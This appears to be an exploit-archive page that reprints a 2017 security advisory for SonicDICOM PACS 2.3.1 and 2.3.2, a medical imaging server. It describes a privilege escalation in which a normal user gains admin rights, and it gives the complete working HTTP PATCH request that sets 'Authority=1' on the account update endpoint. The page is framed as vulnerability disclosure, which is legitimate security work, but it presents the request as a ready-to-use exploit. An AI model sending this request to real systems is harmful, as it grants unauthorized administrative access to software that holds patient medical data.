Home / exploits SonicDICOM PACS 2.3.2 Remote Vertical Privilege Escalation Exploit
Posted on 30 November -0001
<HTML><HEAD><TITLE>SonicDICOM PACS 2.3.2 Remote Vertical Privilege Escalation Exploit</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>SonicDICOM PACS 2.3.2 Remote Vertical Privilege Escalation Exploit Vendor: JIUN Corporation Product web page: https://www.sonicdicom.com Affected version: 2.3.2 and 2.3.1 Summary: SonicDICOM is PACS software that combines the capabilities of DICOM Server with web browser based DICOM Viewer. Desc: The application suffers from a privilege escalation vulnerability. Normal user can elevate his/her privileges by sending a HTTP PATCH request seting the parameter 'Authority' to integer value '1' gaining admin rights. Tested on: Microsoft-HTTPAPI/2.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2017-5396 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5396.php 22.11.2016 -- PATCH /viewer/api/accounts/update HTTP/1.1 Host: 172.19.0.214 Content-Length: 37 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Escalation Browser/1.0 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8 Cookie: {REMOVED_FOR_BREVITY} Connection: close Id=testingus&Name=peend&Authority=1 </BODY></HTML>